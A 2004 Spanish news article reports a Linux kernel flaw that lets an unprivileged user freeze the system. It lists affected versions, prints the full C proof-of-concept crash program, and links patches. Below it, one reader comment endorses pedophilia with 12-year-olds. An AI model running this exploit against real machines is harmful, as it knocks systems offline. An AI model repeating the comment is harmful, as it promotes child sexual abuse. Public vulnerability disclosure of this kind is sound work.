usuario
clave
iniciar sesión
regístrate
Portada
Canales
  • Apple
  • Blackhats
  • Ciencia
  • Comunicación
  • Curiosidades
  • e-Administración
  • Empresas
  • Eventos
  • Hardware
  • Nombramientos
  • Seguridad
  • Software
  • Software Libre
  • Telefonía
  • Videojuegos
  • Wireless
El Periódico
  • Blogs
  • Editorial
  • Entrevistas
  • Gadgets
  • Perfiles
  • Tags
  • Top noticias
  • Videorreportajes
  • Webcómics
Servicios
  • Boletines
  • Contactos
  • Empleo
  • Formación
  • Minijuegos
  • Tienda
  • Viviendas
Comunidad
  • Encuestas
  • Foros
  • Emails de los lectores
Viviendas
Acción:
Propiedad:
Provincia:

Patrocinado por:
Tienda
Boletín semanal
Email:
Boletines publicados
  • Software Libre
  • Noticias
Noticias relacionadas
  • Nuevas versiones de Firefox, KDE y del Kernel Linux
    17 Jun 2004
Otras noticias
  • La mayoría de empresas valencianas utilizan software libre
  • "Neo-shine Tibet Office", Linux en tibetano
  • Los 10 mejores addons para el navegador Firefox (I)
  • Bea Systems propone el uso de código abierto a sus desarrolladores
  • Francia desafía a Microsoft en reequipación de software
  • Kernel 2.4 vs Kernel 2.6
  • Firefox aspira al 10% del mercado en 2005
  • Nace "Mozilla Messaging"
  • Samba acusa a Novell de traición por su acuerdo con Microsoft
  • Es improbable que Linux desplace pronto a Windows
Más noticias
En el foro
  • Software libre estadistico
  • Programa para grabar CD y DVD
  • ¿Qué pensais de Firefox?
  • thunderbird ayuda
  • Firefox es mas inseguro que internet explorer
Ir al foro de Software Libre
KERNEL LINUX

Nueva vulnerabilidad en el núcleo de Linux

Se ha detectado una nueva vulnerabilidad en múltiples versiones del núcleo de Linux por las que un simple programa en C, sin privilegios especiales, puede bloquear todo el sistema . En principio afectarían a las versiones 2.6.x y 2.4.x. Afortunadamente, la comunidad Linux ha actuado con la celeridad que le caracteriza, y ya está corregido.

16 Jun 2004 | REDACCIÓN, LAFLECHA
S

e ha comprobado que las siguientes versiones resultan vulnerables, aunque posiblemente lo sean muchas más:

* Linux 2.6.x

2.6.7-rc2
2.6.6 (vanilla)
2.6.6-rc1 SMP (varified by blaise)
2.6.6 SMP (verified by riven)
2.6.5-gentoo (verified by RatiX)
2.6.5-mm6 - (verified by Mariux)
2.6.5 (fedora core 2 vanilla)
2.6.3-13mdk (Mandrake)

* Linux 2.4.2x

2.4.26 vanilla
2.4.26, grsecurity 2.0 config
2.4.26-rc1 vanilla
2.4.26-gentoo-r1
2.4.22
2.4.22-1.2188 Fedora FC1 Kernel
2.4.20 RH7.3 (gcc 2.96)
2.4.18-bf2.4 (debian woody vanilla)

Las siguientes versiones resultan inmunes, aunque se desconoce la razón por el momento:

* Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
* Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
* Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
* Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
* Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
* 2.2.19-kernel

El programa para comprobar la vulnerabilidad:

#include

#include

#include

static void Handler(int ignore)

{

char fpubuf[108];

__asm__ __volatile__ ("fsave %0 " : : "m"(fpubuf));

write(2, "*", 1);

__asm__ __volatile__ ("frstor %0 " : : "m"(fpubuf));

}


int main(int argc, char *argv[])


{
struct itimerval spec;


signal(SIGALRM, Handler);


spec.it_interval.tv_sec=0;


spec.it_interval.tv_usec=100;


spec.it_value.tv_sec=0;


spec.it_value.tv_usec=100;


setitimer(ITIMER_REAL, &spec, NULL);


while(1)


write(1, ".", 1);


return 0;


}

Más información en Linux Reviews.

Tal y como comenta News.com, los usuarios de Linux se han dado mucha prisa en corregir esa vulnerabilidad en el núcleo de linux. De hecho, durante el día de ayer fueron publicados sendos parches para guardarse de la actuación del exploit que colapsa los sistemas.

El parche para el kernel 2.4.x puede descargarse desde aquí y para el Kernel 2.6.x, aquí.

Boletín

Si quieres recibir cada semana las noticias más interesantes suscríbete a nuestro boletín.

Comentarios
LaFlecha.net no se hace responsable del contenido de los comentarios publicados.
Editar | Borrar | #1 | 16 Jun 2004, 17:16
Warzo

Ha salido el nuevo kernel 2.6.7, entre muchas mejoras corrige esta vulnerabilidad.

Un saludo

Editar | Borrar | #2 | 17 Jun 2004, 04:33
SETAG LIIB

Lo importante es que apliquen el parche. Por ahora hay buena suerte que la mayoría de usuarios de Linux tienen buenos conocimientos en informática y son disciplinados en este aspecto. Ya será otra historia en un futuro cuando la mayoría de usuarios de Linux no tengan idea de informática y los gusanos hagan fiesta con un sistema operativo sin parches... como sucede hoy con Windows.

"quien no conoce la historia o cree que es inmune a esta, esta condenado a repetirla".

Editar | Borrar | #3 | 05 Ago 2008, 00:47
sacarahs

viva la pedofilia a las de 12

Entérate de cuándo hay nuevos comentarios

No se permitirán los comentarios que :
- puedan resultar ofensivos o injuriosos
- incluyan insultos, alusiones sexuales innecesarias y palabras soeces o vulgares
- apoyen la pedofilia, el terrorismo o la xenofobia

Autor
Comentario
BBCode (Ayuda): [b], [i], [quote], [code]
Publicidad
Ahora en LaFlecha puedes encontrar cursos y másters



  • Acerca de LaFlecha
  • Contactar
  • Política de privacidad
  • RSS/RDF
  • Registro de Dominios
    Alojamiento Web
    Servidores Dedicados
    Buscador de Empresas
  • Pixmania
  • Alojamiento web
  • Eventos Barcelona
  • Alojamiento Web
  • Alquiler Limusinas
  • Fotografos Bodas
  • Casino Online
  • ¿Quieres saberlo todo sobre Hacking?